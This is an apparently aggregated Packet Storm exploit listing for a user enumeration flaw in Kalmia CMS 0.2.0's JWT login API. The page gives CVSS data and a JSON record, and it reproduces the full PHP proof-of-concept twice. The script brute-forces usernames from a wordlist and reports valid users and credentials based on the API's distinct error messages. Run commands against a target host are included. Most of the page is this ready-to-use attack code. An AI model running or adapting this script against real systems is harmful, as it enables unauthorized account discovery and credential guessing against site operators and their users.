📄 Kalmia CMS 0.2.0 User Enumeration_PACKETSTORM:213002

6.5 / 10

MEDIUM

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Description

Proof of concept exploit that demonstrates a user enumeration vulnerability via the JWT authentication API on Kalmia CMS version 0.2.0...

Visit Original Source

Basic Information

ID PACKETSTORM:213002

Published Dec 18, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Kalmia CMS 0.2.0 User Enumeration via JWT Auth API |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits) |
| # Vendor : https://kalmia.difuse.io/doc/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/212443/ & CVE-2025-65899

[+] Summary : The JWT authentication endpoint leaks whether a user exists based on the returned JSON "message".

[+] The API returns:

"user_not_found" => invalid username
"invalid_password" => valid username but wrong password
"200 OK" => valid credentials

[+] This PoC performs username brute-force enumeration using this flaw.

Usage:
php poc.php URL -u user -p pass
php poc.php URL -w wordlist.txt -p pass

====================================================================
Saving:
Save the PHP PoC as: poc.php

Running:
php poc.php http://target:2727 -u admin -p 123456
php poc.php http://target:2727 -w users.txt -p 123456

[+] POC :

<?php
/*
* Kalmia CMS v0.2.0 – User Enumeration – CVE‑2025‑65900
* by Indoushka
*/

if ($argc < 2) {
die("Usage:
php $argv[0] URL -u user -p pass
php $argv[0] URL -w wordlist.txt -p pass\n");
}

$url = $argv[1];
$username = null;
$password = null;
$wordlist = null;

for ($i = 2; $i < $argc; $i++) {
if ($argv[$i] === "-u" && isset($argv[$i+1])) $username = $argv[++$i];
elseif ($argv[$i] === "-p" && isset($argv[$i+1])) $password = $argv[++$i];
elseif ($argv[$i] === "-w" && isset($argv[$i+1])) $wordlist = $argv[++$i];
}

function http_post($full_url, $payload) {
$opts = [
"http" => [
"method" => "POST",
"header" =>
"Content-Type: application/json\r\n" .
"User-Agent: Mozilla/5.0\r\n",
"content" => json_encode($payload),
"timeout" => 30
]
];
return @file_get_contents($full_url, false, stream_context_create($opts));
}

function checkCredentials($base, $user, $pass) {
$endpoint = "/kal-api/auth/jwt/create";
$full_url = rtrim($base, "/") . $endpoint;

$response = http_post($full_url, [
"username" => $user,
"password" => $pass
]);

if ($response === false) return "connection_error";

$json = json_decode($response, true);
if (!is_array($json)) return "invalid_response";

if (isset($json["refresh"])) return "valid_credentials";
if (($json["message"] ?? "") === "user_not_found") return "user_not_found";
if (($json["message"] ?? "") === "invalid_password") return "invalid_password";

return "unknown_error";
}

echo "\n===============================================================\n";
echo "[*] Target Base: $url\n";
echo "===============================================================\n";

if ($username && $password) {
$result = checkCredentials($url, $username, $password);
if ($result === "valid_credentials")
echo "[+] Valid Credentials: $username:$password\n";
elseif ($result === "invalid_password")
echo "[+] Valid User: $username\n";
elseif ($result === "user_not_found")
echo "[-] User does not exist: $username\n";
else
echo "[-] Error: $result\n";

exit;
}

if ($wordlist && $password) {
if (!file_exists($wordlist))
die("Wordlist file not found: $wordlist\n");

$users = file($wordlist, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);
echo "[*] Starting enumeration for " . count($users) . " users...\n\n";

$valid_users = [];
foreach ($users as $u) {
$result = checkCredentials($url, $u, $password);

if ($result === "invalid_password") {
echo "[+] Valid user found: $u\n";
$valid_users[] = $u;
} elseif ($result === "valid_credentials") {
echo "[+] Valid credentials: $u:$password\n";
}
}

if ($valid_users)
echo "\n[+] Summary – Valid users: " . implode(", ", $valid_users) . "\n";
else
echo "[-] No valid users found\n";

exit;
}

echo "Error: Missing parameters.\n";
exit;
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-12-18T16:41:38",
    "description": "Proof of concept exploit that demonstrates a user enumeration vulnerability via the JWT authentication API on Kalmia CMS version 0.2.0...",
    "published": "2025-12-18T00:00:00",
    "modified": "2025-12-18T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Kalmia CMS 0.2.0 User Enumeration",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:213002",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-65899",
        "CVE-2025-65900"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Kalmia CMS 0.2.0 User Enumeration via JWT Auth API                                                                          |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.2 (64 bits)                                                            |\n    | # Vendor    : https://kalmia.difuse.io/doc/                                                                                               |\n    =============================================================================================================================================\n    \n    [+] References : https://packetstorm.news/files/id/212443/ &\t\tCVE-2025-65899\n    \n    [+] Summary : The JWT authentication endpoint leaks whether a user exists based on the returned JSON \"message\". \n    \n    [+] The API returns:\n    \n     \"user_not_found\"            => invalid username\n     \"invalid_password\"          => valid username but wrong password\n     \"200 OK\"                    => valid credentials\n    \n    [+] This PoC performs username brute-force enumeration using this flaw.\n    \n    Usage:\n      php poc.php URL -u user -p pass\n      php poc.php URL -w wordlist.txt -p pass\n    \n    ====================================================================\n    Saving:\n      Save the PHP PoC as: poc.php\n    \n    Running:\n      php poc.php http://target:2727 -u admin -p 123456\n      php poc.php http://target:2727 -w users.txt -p 123456\n    \n    [+]  POC : \n    \n    <?php\n    /*\n     * Kalmia CMS v0.2.0 \u2013 User Enumeration \u2013 CVE\u20112025\u201165900\n     * by Indoushka\n     */\n    \n    if ($argc < 2) {\n        die(\"Usage:\n      php $argv[0] URL -u user -p pass\n      php $argv[0] URL -w wordlist.txt -p pass\\n\");\n    }\n    \n    $url        = $argv[1];\n    $username   = null;\n    $password   = null;\n    $wordlist   = null;\n    \n    for ($i = 2; $i < $argc; $i++) {\n        if ($argv[$i] === \"-u\" && isset($argv[$i+1])) $username = $argv[++$i];\n        elseif ($argv[$i] === \"-p\" && isset($argv[$i+1])) $password = $argv[++$i];\n        elseif ($argv[$i] === \"-w\" && isset($argv[$i+1])) $wordlist = $argv[++$i];\n    }\n    \n    function http_post($full_url, $payload) {\n        $opts = [\n            \"http\" => [\n                \"method\"  => \"POST\",\n                \"header\"  =>\n                    \"Content-Type: application/json\\r\\n\" .\n                    \"User-Agent: Mozilla/5.0\\r\\n\",\n                \"content\" => json_encode($payload),\n                \"timeout\" => 30\n            ]\n        ];\n        return @file_get_contents($full_url, false, stream_context_create($opts));\n    }\n    \n    function checkCredentials($base, $user, $pass) {\n        $endpoint = \"/kal-api/auth/jwt/create\";\n        $full_url = rtrim($base, \"/\") . $endpoint;\n    \n        $response = http_post($full_url, [\n            \"username\" => $user,\n            \"password\" => $pass\n        ]);\n    \n        if ($response === false) return \"connection_error\";\n    \n        $json = json_decode($response, true);\n        if (!is_array($json)) return \"invalid_response\";\n    \n        if (isset($json[\"refresh\"]))         return \"valid_credentials\";\n        if (($json[\"message\"] ?? \"\") === \"user_not_found\")   return \"user_not_found\";\n        if (($json[\"message\"] ?? \"\") === \"invalid_password\") return \"invalid_password\";\n    \n        return \"unknown_error\";\n    }\n    \n    echo \"\\n===============================================================\\n\";\n    echo \"[*] Target Base: $url\\n\";\n    echo \"===============================================================\\n\";\n    \n    if ($username && $password) {\n        $result = checkCredentials($url, $username, $password);\n        if ($result === \"valid_credentials\")\n            echo \"[+] Valid Credentials: $username:$password\\n\";\n        elseif ($result === \"invalid_password\")\n            echo \"[+] Valid User: $username\\n\";\n        elseif ($result === \"user_not_found\")\n            echo \"[-] User does not exist: $username\\n\";\n        else\n            echo \"[-] Error: $result\\n\";\n    \n        exit;\n    }\n    \n    if ($wordlist && $password) {\n        if (!file_exists($wordlist))\n            die(\"Wordlist file not found: $wordlist\\n\");\n    \n        $users = file($wordlist, FILE_IGNORE_NEW_LINES | FILE_SKIP_EMPTY_LINES);\n        echo \"[*] Starting enumeration for \" . count($users) . \" users...\\n\\n\";\n    \n        $valid_users = [];\n        foreach ($users as $u) {\n            $result = checkCredentials($url, $u, $password);\n    \n            if ($result === \"invalid_password\") {\n                echo \"[+] Valid user found: $u\\n\";\n                $valid_users[] = $u;\n            } elseif ($result === \"valid_credentials\") {\n                echo \"[+] Valid credentials: $u:$password\\n\";\n            }\n        }\n    \n        if ($valid_users)\n            echo \"\\n[+] Summary \u2013 Valid users: \" . implode(\", \", $valid_users) . \"\\n\";\n        else\n            echo \"[-] No valid users found\\n\";\n    \n        exit;\n    }\n    \n    echo \"Error: Missing parameters.\\n\";\n    exit;\n    ?>\n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/213002",
    "cvss": {
        "score": 6.5,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/213002/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply